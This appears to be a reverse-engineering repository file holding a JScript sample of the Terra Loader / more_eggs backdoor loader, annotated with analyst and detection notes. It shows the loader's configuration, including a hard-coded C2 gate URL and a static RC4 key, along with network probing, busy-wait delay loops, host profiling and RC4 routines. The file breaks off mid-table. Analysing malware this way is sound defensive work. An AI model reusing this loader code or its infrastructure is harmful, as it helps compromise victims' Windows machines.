Malware-Misc-RE/2019-04-18-Terra Loader - More Eggs Signed Loader.js /
| // sample from SHA256: e9a6a275d20b73605c7af7c48140baeff0258b185a315a6beb54d373740a8b14 | |
| // signed malware install loader -> JS Terra Loader aka more_eggs backdoor | |
| // h/t @malwarehunterteam | |
| function anonymous() { | |
| // Loader configuration. Analyst notes: each value is described where it is declared; values whose only use is outside the visible portion are marked as such. | |
| var BV = "6.1"; | |
| // BV: presumably a loader build/version string; not referenced in the visible portion — confirm against the rest of the sample | |
| var Gate = "https://report.monicabellucci.kz/295693495/info"; | |
| // Gate: hard-coded network endpoint (network IoC). Not referenced in the visible portion; its use is presumably in main()/go(), which are outside this view | |
| var hit_each = 10; | |
| var error_retry = 2; | |
| var restart_h = 4; | |
| var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each); | |
| // rcon_max evaluates to 24 with the constants above (10 * 240 / 100); the counter logic that compares it with rcon_now is not in view | |
| var Rkey = "ltgjjhh6iogejlaDKFgdf"; | |
| // Rkey: static key string. zzzz4()/zzz4Bytes() further down implement RC4 keyed by a string; presumably this is that key — confirm at the call sites (not in view) | |
| var rcon_now = 0; | |
| var gtfo = false; | |
| var selfdel = false; | |
| // gtfo/selfdel: control flags declared here and never written in the visible portion | |
| var table = []; | |
| var Build = ""; | |
| var PCN = ""; | |
| var UNM = ""; | |
| var SYSTEM = 0; | |
| var rootK = "HKCU"; | |
| // rootK: registry hive prefix string (HKCU). The only registry access in view is rexist(), which takes a full path argument, so the concatenation happens elsewhere | |
| var workingDir = ""; | |
| var main_mitm = ""; | |
| var xApp = ""; | |
| var xTmp = ""; | |
| var PreserveH = ""; | |
| var xStore = ""; | |
| // The remaining empty strings are placeholders populated outside the visible portion; names suggest computer name (PCN), user name (UNM) and app/temp/working directories — unverified | |
| var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"'; | |
| // set: 91-character alphabet (alphanumerics plus printable punctuation); not used in the visible portion. rStr() below uses its own alphanumeric-only alphabet | |
| // COM object factory. ActiveXObject exists only under Windows Script Host (wscript.exe/cscript.exe) JScript, which pins the | |
| // execution environment of this sample. Every host interaction below — HTTP, filesystem, registry, environment variables — is | |
| // created through this one call, so a ProgID allow-list or COM instantiation telemetry on script hosts covers all of them. | |
| function obj(xString) { | |
| return new ActiveXObject(xString); | |
| } | |
| // Two MSXML HTTP client objects, created with ProgID fallbacks from newest to oldest: | |
| //   con -> Msxml2.XMLHTTP.6.0, then Msxml2.XMLHTTP.3.0, then Microsoft.XMLHTTP | |
| //   xhr -> Msxml2.ServerXMLHTTP.6.0, then Msxml2.ServerXMLHTTP.3.0 (no third fallback: a second failure propagates out of anonymous()) | |
| // Detection note: instantiation of these ProgIDs by a script-host process is visible to COM/AMSI-based telemetry. | |
| var con; | |
| try { | |
| con = obj("Msxml2.XMLHTTP.6.0"); | |
| } catch (e) { | |
| try { | |
| con = obj("Msxml2.XMLHTTP.3.0"); | |
| } catch (e2) { | |
| con = obj("Microsoft.XMLHTTP"); | |
| } | |
| } | |
| var xhr; | |
| try { | |
| xhr = obj("Msxml2.ServerXMLHTTP.6.0"); | |
| } catch (e3) { | |
| xhr = obj("Msxml2.ServerXMLHTTP.3.0"); | |
| } | |
| // Connectivity probe. Synchronously GETs a fixed public URL and returns true only when the response body equals | |
| // 'This is another XSL namespace\n' (loose == comparison). method 1 uses xhr (ServerXMLHTTP); any other value uses con (XMLHTTP). | |
| // If open() or send() throws and method === 0, the function retries once with method 1; otherwise it returns false. | |
| // Resp is written from the onreadystatechange handler. Because the request is synchronous (third open() argument false), | |
| // the handler is expected to have fired before send() returns; if it has not, the function returns false (the initial value). | |
| // Detection note: a GET to www.w3.org/1999/XSL/Format issued by wscript.exe/cscript.exe (no browser context) is an unusual pairing worth alerting on. | |
| function check_Net(method) { | |
| var Resp = false; | |
| var conz1; | |
| var t11 = ""; | |
| if (method === 1) { | |
| conz1 = xhr; | |
| } else { | |
| conz1 = con; | |
| } | |
| try { | |
| conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false); | |
| } catch (e1) { | |
| if (method === 0) { | |
| return check_Net(1); | |
| } else { | |
| return false; | |
| } | |
| } | |
| // readyState 4 = request complete; all non-200 / empty-body / mismatched-body paths set Resp = false explicitly | |
| conz1.onreadystatechange = function() { | |
| if (conz1.readyState === 4) { | |
| if (conz1.status === 200) { | |
| t11 = conz1.responseText; | |
| if (t11) { | |
| if (t11 == 'This is another XSL namespace\n') { | |
| Resp = true; | |
| } else { | |
| Resp = false; | |
| } | |
| } else { | |
| Resp = false; | |
| } | |
| } else { | |
| Resp = false; | |
| } | |
| } | |
| }; | |
| try { | |
| conz1.send(); | |
| } catch (e2) { | |
| if (method === 0) { | |
| return check_Net(1); | |
| } else { | |
| return false; | |
| } | |
| } | |
| return Resp; | |
| } | |
| // String length range check: false for an empty string, true when min <= length <= max. | |
| // NOTE: a non-empty string whose length is outside [min, max] falls off the end and returns undefined (falsy), not false — | |
| // callers that test truthiness will not notice, callers comparing === false will. | |
| function cLength(mstr, min, max) { | |
| var n = mstr.length; | |
| if (n === 0) { | |
| return false; | |
| } | |
| if (n >= min && (n <= max)) { | |
| return true; | |
| } | |
| } | |
| // Random integer in the inclusive range [ceil(min), floor(max)] from Math.random() (not cryptographically secure, which is | |
| // irrelevant here — used only to size random strings). No guard for min > max. | |
| function rInt(min, max) { | |
| min = Math.ceil(min); | |
| max = Math.floor(max); | |
| return Math.floor(Math.random() * (max - min + 1)) + min; | |
| } | |
| // Random alphanumeric string of length len (A-Z, a-z, 0-9). Because the loop is do-while, len <= 0 still yields one character. | |
| // Used by fuck_js() below to randomise a URL path; randomisation of this kind is why path-based network signatures are weak for this sample. | |
| function rStr(len) { | |
| var xRnd = ""; | |
| var i; | |
| var randomPoz; | |
| var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; | |
| i = 0; | |
| do { | |
| randomPoz = Math.floor(Math.random() * charSet.length); | |
| // substring(pos, pos + 1) picks a single character | |
| xRnd += charSet.substring(randomPoz, randomPoz + 1); | |
| i += 1; | |
| } while (i < len); | |
| return xRnd; | |
| } | |
| // Network-bound stall, used as the body of the busy-wait loops in waitfor()/waitfor2(). Issues one synchronous GET to | |
| // http://8.8.8.8/<random 8..32 alphanumeric chars> via xhr (ServerXMLHTTP), after setTimeouts(resolve, connect, send, receive) | |
| // of 5 s / 5 s / 10 s / 10 s. The response is never read; the function returns false on any exception and undefined otherwise. | |
| // Detection note: repeated plain-HTTP requests (not DNS) to 8.8.8.8 with random paths, originating from a script host, are a | |
| // distinctive network signal for this delay loop. | |
| function fuck_js() { | |
| var xNow = rInt(8, 32); | |
| var rNow = rStr(xNow); | |
| try { | |
| xhr.setTimeouts(5000, 5000, 10000, 10000); | |
| xhr.open("GET", "http://8.8.8.8/" + rNow, false); | |
| xhr.send(); | |
| } catch (e9) { | |
| return false; | |
| } | |
| } | |
| // Blocking delay of zMinute minutes, then transfers control to main() (not in the visible portion). | |
| // Date.parse(Date()) is the current time in ms at one-second resolution (the Date() string form carries no milliseconds). | |
| // The wait is a busy loop whose only work is fuck_js(), i.e. the time is spent issuing HTTP requests rather than sleeping; | |
| // WScript.Sleep is not used anywhere in the visible portion. | |
| function waitfor(zMinute) { | |
| var limit = Date.parse(Date()) + (zMinute * 60000); | |
| while (Date.parse(Date()) < limit) { | |
| fuck_js(); | |
| } | |
| main(); | |
| } | |
| // Same busy-wait as waitfor() (zMinute minutes of fuck_js() calls), but the continuation is conditional: go() — not in the | |
| // visible portion — is called only when iGo === 1; any other value returns to the caller after the delay. | |
| function waitfor2(zMinute, iGo) { | |
| var xlmt; | |
| xlmt = Date.parse(Date()) + (zMinute * 60000); | |
| while (Date.parse(Date()) < xlmt) { | |
| fuck_js(); | |
| } | |
| if (iGo === 1) { | |
| go(); | |
| } | |
| } | |
| // File existence check via Scripting.FileSystemObject.FileExists. Returns true/false; any COM exception (including failure to | |
| // create the FSO) is swallowed and reported as false, so a blocked FileSystemObject is indistinguishable from "file absent". | |
| function fexist(xpath) { | |
| var fso; | |
| try { | |
| fso = obj("Scripting.FileSystemObject"); | |
| if (fso.FileExists(xpath)) { | |
| return true; | |
| } else { | |
| return false; | |
| } | |
| } catch (feer) { | |
| return false; | |
| } | |
| } | |
| // Registry value existence check via WScript.Shell.RegRead(xpath). A missing key/value makes RegRead throw, which is mapped to | |
| // false. Returns true when a non-null value is read. NOTE: if RegRead returns null without throwing, the function falls off the | |
| // end and returns undefined (falsy) rather than false. No writes happen here; the hive prefix (rootK, "HKCU") is applied by the caller. | |
| function rexist(xpath) { | |
| var sh; | |
| var rdata; | |
| try { | |
| sh = obj("Wscript.shell"); | |
| rdata = sh.RegRead(xpath); | |
| if (rdata !== null) { | |
| return true; | |
| } | |
| } catch (e71) { | |
| return false; | |
| } | |
| } | |
| // Reads environment variable xVar through WScript.Shell.Environment: the "SYSTEM" collection when xSystem === 1, otherwise the | |
| // "PROCESS" collection. No exception handling — a failed WScript.Shell creation propagates to the caller. | |
| function myEnv(xVar, xSystem) { | |
| var a1; | |
| var rEnv; | |
| a1 = obj("WScript.Shell"); | |
| if (xSystem === 1) { | |
| rEnv = a1.environment("SYSTEM"); | |
| } else { | |
| rEnv = a1.environment("PROCESS"); | |
| } | |
| // the environment collection is callable with the variable name (WSH default-property access) | |
| return rEnv(xVar); | |
| } | |
| // Host architecture probe: "64" when the SYSTEM-scope PROCESSOR_ARCHITECTURE is exactly "AMD64", "86" for every other value | |
| // (x86, ARM64, or a missing variable). The SYSTEM scope is queried deliberately — the PROCESS value differs under a 32-bit host process. | |
| function myBits() { | |
| var xBits; | |
| xBits = myEnv("PROCESSOR_ARCHITECTURE", 1); | |
| if (xBits === "AMD64") { | |
| return "64"; | |
| } else { | |
| return "86"; | |
| } | |
| } | |
| // RC4 over a string: key-scheduling (first two loops) followed by the keystream generator (third loop), XORing each UTF-16 code | |
| // unit of str with a keystream byte and rebuilding a string with String.fromCharCode. Returns "" when key or str is falsy. | |
| // The routine assumes str holds byte values (code units < 256); a code unit >= 256 would XOR into a value outside the byte range. | |
| // tB()/tS() below convert between strings and single-byte arrays, presumably to satisfy that assumption — confirm at call sites. | |
| // Analyst note: RC4 with the static key Rkey declared above is a likely candidate for decoding any blobs found elsewhere in the sample. | |
| function zzzz4(key, str) { | |
| var s = []; | |
| var j = 0; | |
| var x; | |
| var res = ""; | |
| var i; | |
| var y; | |
| if (key && str) { | |
| // KSA step 1: identity permutation of 0..255 | |
| i = 0; | |
| do { | |
| s[i] = i; | |
| i += 1; | |
| } while (i < 256); | |
| // KSA step 2: key-dependent swaps, key bytes taken cyclically | |
| i = 0; | |
| do { | |
| j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| i += 1; | |
| } while (i < 256); | |
| // PRGA: one keystream byte per input code unit; y indexes the input | |
| i = 0; | |
| j = 0; | |
| y = 0; | |
| do { | |
| i = (i + 1) % 256; | |
| j = (j + s[i]) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); | |
| y += 1; | |
| } while (y < str.length); | |
| } | |
| return res; | |
| } | |
| // RC4 over a numeric array (same KSA/PRGA as zzzz4, argument order reversed: data first, key second). Each element of xArray is | |
| // XORed with a keystream byte and pushed to a new array; xArray itself is not modified. Returns [] when key or xArray is falsy. | |
| // Since RC4 is symmetric, the same call both encodes and decodes. | |
| function zzz4Bytes(xArray, key) { | |
| var s = []; | |
| var j = 0; | |
| var x; | |
| var outBytes = []; | |
| var i; | |
| var y; | |
| if (key && xArray) { | |
| // KSA step 1: identity permutation of 0..255 | |
| i = 0; | |
| do { | |
| s[i] = i; | |
| i += 1; | |
| } while (i < 256); | |
| // KSA step 2: key-dependent swaps, key bytes taken cyclically | |
| i = 0; | |
| do { | |
| j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| i += 1; | |
| } while (i < 256); | |
| // PRGA: one keystream byte per input element; y indexes the input | |
| i = 0; | |
| j = 0; | |
| y = 0; | |
| do { | |
| i = (i + 1) % 256; | |
| j = (j + s[i]) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]); | |
| y += 1; | |
| } while (y < xArray.length); | |
| } | |
| return outBytes; | |
| } | |
| // String -> single-byte array conversion. y[] maps a Unicode code point to a byte in 0x80..0xFF; the pairs (U+00C7 -> 0x80, | |
| // U+00FC -> 0x81, ... U+00A0 -> 0xFF) appear to be the high half of IBM code page 437 (OEM-US). Code units below 128 pass | |
| // through unchanged. Returns an array of numbers, one per UTF-16 code unit of htc; a code unit >= 128 with no table entry | |
| // yields undefined in that position. tS() further down is the inverse table. Presumably used to turn strings into bytes for | |
| // zzz4Bytes() and back — confirm at call sites (not in view). | |
| function tB(htc) { | |
| var y = []; | |
| y[0xC7] = 0x80; | |
| y[0xFC] = 0x81; | |
| y[0xE9] = 0x82; | |
| y[0xE2] = 0x83; | |
| y[0xE4] = 0x84; | |
| y[0xE0] = 0x85; | |
| y[0xE5] = 0x86; | |
| y[0xE7] = 0x87; | |
| y[0xEA] = 0x88; | |
| y[0xEB] = 0x89; | |
| y[0xE8] = 0x8A; | |
| y[0xEF] = 0x8B; | |
| y[0xEE] = 0x8C; | |
| y[0xEC] = 0x8D; | |
| y[0xC4] = 0x8E; | |
| y[0xC5] = 0x8F; | |
| y[0xC9] = 0x90; | |
| y[0xE6] = 0x91; | |
| y[0xC6] = 0x92; | |
| y[0xF4] = 0x93; | |
| y[0xF6] = 0x94; | |
| y[0xF2] = 0x95; | |
| y[0xFB] = 0x96; | |
| y[0xF9] = 0x97; | |
| y[0xFF] = 0x98; | |
| y[0xD6] = 0x99; | |
| y[0xDC] = 0x9A; | |
| y[0xA2] = 0x9B; | |
| y[0xA3] = 0x9C; | |
| y[0xA5] = 0x9D; | |
| y[0x20A7] = 0x9E; | |
| y[0x192] = 0x9F; | |
| y[0xE1] = 0xA0; | |
| y[0xED] = 0xA1; | |
| y[0xF3] = 0xA2; | |
| y[0xFA] = 0xA3; | |
| y[0xF1] = 0xA4; | |
| y[0xD1] = 0xA5; | |
| y[0xAA] = 0xA6; | |
| y[0xBA] = 0xA7; | |
| y[0xBF] = 0xA8; | |
| y[0x2310] = 0xA9; | |
| y[0xAC] = 0xAA; | |
| y[0xBD] = 0xAB; | |
| y[0xBC] = 0xAC; | |
| y[0xA1] = 0xAD; | |
| y[0xAB] = 0xAE; | |
| y[0xBB] = 0xAF; | |
| y[0x2591] = 0xB0; | |
| y[0x2592] = 0xB1; | |
| y[0x2593] = 0xB2; | |
| y[0x2502] = 0xB3; | |
| y[0x2524] = 0xB4; | |
| y[0x2561] = 0xB5; | |
| y[0x2562] = 0xB6; | |
| y[0x2556] = 0xB7; | |
| y[0x2555] = 0xB8; | |
| y[0x2563] = 0xB9; | |
| y[0x2551] = 0xBA; | |
| y[0x2557] = 0xBB; | |
| y[0x255D] = 0xBC; | |
| y[0x255C] = 0xBD; | |
| y[0x255B] = 0xBE; | |
| y[0x2510] = 0xBF; | |
| y[0x2514] = 0xC0; | |
| y[0x2534] = 0xC1; | |
| y[0x252C] = 0xC2; | |
| y[0x251C] = 0xC3; | |
| y[0x2500] = 0xC4; | |
| y[0x253C] = 0xC5; | |
| y[0x255E] = 0xC6; | |
| y[0x255F] = 0xC7; | |
| y[0x255A] = 0xC8; | |
| y[0x2554] = 0xC9; | |
| y[0x2569] = 0xCA; | |
| y[0x2566] = 0xCB; | |
| y[0x2560] = 0xCC; | |
| y[0x2550] = 0xCD; | |
| y[0x256C] = 0xCE; | |
| y[0x2567] = 0xCF; | |
| y[0x2568] = 0xD0; | |
| y[0x2564] = 0xD1; | |
| y[0x2565] = 0xD2; | |
| y[0x2559] = 0xD3; | |
| y[0x2558] = 0xD4; | |
| y[0x2552] = 0xD5; | |
| y[0x2553] = 0xD6; | |
| y[0x256B] = 0xD7; | |
| y[0x256A] = 0xD8; | |
| y[0x2518] = 0xD9; | |
| y[0x250C] = 0xDA; | |
| y[0x2588] = 0xDB; | |
| y[0x2584] = 0xDC; | |
| y[0x258C] = 0xDD; | |
| y[0x2590] = 0xDE; | |
| y[0x2580] = 0xDF; | |
| y[0x3B1] = 0xE0; | |
| y[0xDF] = 0xE1; | |
| y[0x393] = 0xE2; | |
| y[0x3C0] = 0xE3; | |
| y[0x3A3] = 0xE4; | |
| y[0x3C3] = 0xE5; | |
| y[0xB5] = 0xE6; | |
| y[0x3C4] = 0xE7; | |
| y[0x3A6] = 0xE8; | |
| y[0x398] = 0xE9; | |
| y[0x3A9] = 0xEA; | |
| y[0x3B4] = 0xEB; | |
| y[0x221E] = 0xEC; | |
| y[0x3C6] = 0xED; | |
| y[0x3B5] = 0xEE; | |
| y[0x2229] = 0xEF; | |
| y[0x2261] = 0xF0; | |
| y[0xB1] = 0xF1; | |
| y[0x2265] = 0xF2; | |
| y[0x2264] = 0xF3; | |
| y[0x2320] = 0xF4; | |
| y[0x2321] = 0xF5; | |
| y[0xF7] = 0xF6; | |
| y[0x2248] = 0xF7; | |
| y[0xB0] = 0xF8; | |
| y[0x2219] = 0xF9; | |
| y[0xB7] = 0xFA; | |
| y[0x221A] = 0xFB; | |
| y[0x207F] = 0xFC; | |
| y[0xB2] = 0xFD; | |
| y[0x25A0] = 0xFE; | |
| y[0xA0] = 0xFF; | |
| var ami = []; | |
| var mi; | |
| var renderer; | |
| var atends; | |
| mi = 0; | |
| // do-while: an empty htc still runs once and produces [undefined] (charCodeAt(0) is NaN, NaN < 128 is false, y[NaN] is undefined) | |
| do { | |
| renderer = htc.charCodeAt(mi); | |
| if (renderer < 128) { | |
| atends = renderer; | |
| } else { | |
| atends = y[renderer]; | |
| } | |
| ami.push(atends); | |
| mi += 1; | |
| } while (mi < htc.length); | |
| return ami; | |
| } | |
| function tS(arenderer) { | |
| var x = []; | |
| x[0x80] = 0x00C7; | |
| x[0x81] = 0x00FC; | |
| x[0x82] = 0x00E9; | |
| x[0x83] = 0x00E2; | |
| x[0x84] = 0x00E4; | |
| x[0x85] = 0x00E0; | |
| x[0x86] = 0x00E5; | |
| x[0x87] = 0x00E7; | |
| x[0x88] = 0x00EA; | |
| x[0x89] = 0x00EB; | |
| x[0x8A] = 0x00E8; | |
| x[0x8B] = 0x00EF; | |
| x[0x8C] = 0x00EE; | |
| x[0x8D] = 0x00EC; | |
| x[0x8E] = 0x00C4; | |
| x[0x8F] = 0x00C5; | |
| x[0x90] = 0x00C9; | |
| x[0x91] = 0x00E6; | |
| x[0x92] = 0x00C6; | |
| x[0x93] = 0x00F4; | |
| x[0x94] = 0x00F6; | |
| x[0x95] = 0x00F2; | |
| x[0x96] = 0x00FB; | |
| x[0x97] = 0x00F9; | |
| x[0x98] = 0x00FF; | |
| x[0x99] = 0x00D6; | |
| x[0x9A] = 0x00DC; | |
| x[0x9B] = 0x00A2; | |
| x[0x9C] = 0x00A3; | |
| x[0x9D] = 0x00A5; | |
| x[0x9E] = 0x20A7; | |
| x[0x9F] = 0x0192; | |
| x[0xA0] = 0x00E1; | |
| x[0xA1] = 0x00ED; | |
| x[0xA2] = 0x00F3; | |
| x[0xA3] = 0x00FA; | |
| x[0xA4] = 0x00F1; | |
| x[0xA5] = 0x00D1; | |
| x[0xA6] = 0x00AA; | |
| x[0xA7] = 0x00BA; | |
| x[0xA8] = 0x00BF; | |
| x[0xA9] = 0x2310; | |
| x[0xAA] = 0x00AC; | |
| x[0xAB] = 0x00BD; | |
| x[0xAC] = 0x00BC; | |
| x[0xAD] = 0x00A1; | |
| x[0xAE] = 0x00AB; | |
| x[0xAF] = 0x00BB; | |
| x[0xB0] = 0x2591; | |
| x[0xB1] = 0x2592; | |
| x[0xB2] = 0x2593; | |
| x[0xB3] = 0x2502; | |
| x[0xB4] = 0x2524; | |
| x[0xB5] = 0x2561; | |
| x[0xB6] = 0x2562; | |
| x[0xB7] = 0x2556; | |
| x[0xB8] = 0x2555; | |
| x[0xB9] = 0x2563; | |
| x[0xBA] = 0x2551; | |
| x[0xBB] = 0x2557; | |
| x[0xBC] = 0x255D; | |
| x[0xBD] = 0x255C; | |
| x[0xBE] = 0x255B; | |
| x[0xBF] = 0x2510; | |
| x[0xC0] = 0x2514; | |
| x[0xC1] = 0x2534; | |
| x[0xC2] = 0x252C; | |
| x[0xC3] = 0x251C; | |
| x[0xC4] = 0x2500; | |
| x[0xC5] = 0x253C; | |
| x[0xC6] = 0x255E; | |
| x[0xC7] = 0x255F; | |
| x[0xC8] = 0x255A; | |
| x[0xC9] = 0x2554; | |
| x[0xCA] = 0x2569; | |
| x[0xCB] = 0x2566; | |
| x[0xCC] = 0x2560; | |
| x[0xCD] = 0x2550; | |
| x[0xCE] = 0x256C; | |
| x[0xCF] = 0x2567; | |
| x[0xD0] = 0x2568; | |
| x[0xD1] = 0x2564; | |
| x[0xD2] = 0x2565; | |
| ... | |
| /// |